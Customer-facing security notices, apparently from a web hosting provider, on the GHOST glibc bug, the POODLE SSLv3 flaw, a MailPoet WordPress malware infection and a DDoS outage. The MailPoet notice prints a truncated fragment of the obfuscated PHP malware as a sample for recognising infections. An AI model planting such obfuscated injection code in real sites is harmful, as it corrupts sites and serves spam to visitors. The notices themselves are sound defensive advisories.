Software security researchers have recently identified a bug in the Linux GNU C Library (shorthand: glibc) that provides hackers with the ability to take remote control of an entire system without having any prior knowledge of the system’s credentials. Qualys, a security firm out of California, identified GHOST and disclosed their discovery Tuesday.
This security issue is a critical one and affects an enormous number of systems on the Internet. Due to its seriousness and its widespread possible affect, there is a large amount of media coverage that you can look to if you would like to find out more information about Ghost:
or simply do a search for “Ghost vulnerability”.
We want to let you know that at this time, all shared servers, as well as Cloud VPS and Dedicated Servers that we have access to have been patched for this vulnerability. As long as you have not manually/by choice removed our access keys, your server will have been patched in our update and you don’t have anything to worry about.
If you manage your own server and have removed our access, we are unable to secure your machine for you. We encourage you to patch this issue immediately, as the security issue is a critical one. If you have any questions, or would like to add our access back so that we can secure your server against this vulnerability for you, please contact support.
If you would like to verify and test your server yourself, there is a pretty comprehensive article over at the nixCraft blog on how to test and patch a variety of Linux Distributions.
On October 14th, Google announced their engineers discovered a flaw in the design of SSL v3, and this vulnerability has been named “POODLE”. Whenever there is an announcement about security vulnerabilities that may affect our customers, we try and make sure that we can you the information so you can understand how these issues may affect you, and what steps we may be taking to address new vulnerabilities.
For our hosting customers, we want to let you know that we are disabling SSL v3 on all our servers to ensure your site’s security. Most people should not experience any issues as a result of the changes we’re making – Google estimates this change will affect less than 1% of the internet as the SSL 3.0 protocol is almost 15 years old, but has remained in place to support users running older browsers.
Check out Google’s Security blog for details on how Windows XP or IE6 are vulnerable to malicious code exploiting this problem.
You should also take steps to protect yourself and your browser from the flaw just to be safe. If you are using IE6, you will need to update your version of IE, or consider switching to Chrome or Firefox, to access our services–and to protect yourself and the websites you visit.
If you are using the latest version of Firefox, they will be disabling SSL v3 in their November 25th Firefox update by default, but you don’t have to wait for that update. Mozilla has created a plugin that will allow you to set the minimum SSL version that Firefox will accept, and you can grab it here:
To turn off SSLv3 support in Internet Explorer 11:
Setting -> Internet Options -> Advanced Tab -> Uncheck “SSLv3″ under “Security”.
There is a known malware infection caused by a serious vulnerability in the MailPoet WordPress plugin. This malicious attack attempts to slyly inject Spam into the hacked site, which is causing websites to break, and focuses predominantly on WordPress sites with outdated plugins or weak admin passwords.
What It Looks Like
The infected PHP code is very buggy and is corrupting legitimate website files, as well as themes and plugin files, which causes PHP errors to be displayed instead of website content:
Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91
After removing the infecting malware, the only way to remedy the issues is to restore the corrupted files from a backup. This is what the malware code looks like:
< ?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5?c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3?of:opjudovg< ~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)…
If you are running MailPoet, we recommend upgrading it to the latest version. If you do not have a firewall on your website, you have to upgrade the plugin or remove it altogether to avoid more issues.
If you aren’t able to fix the issue on your end, please don’t hesitate to contact Support. We’re happy to help.
We are currently experiencing a DDoS attack on our Detroit facility.
This attack is part of a larger-scale attack that is affecting multiple internet routing points. More details can be seen here:
http://www.akamai.com/html/technology/dataviz1.html (click on ‘Attacks’)
We are continuing to work hard to remedy the situation with our Network and System Administrators.
Please stand by for additional information.
We’ll update you as we know more!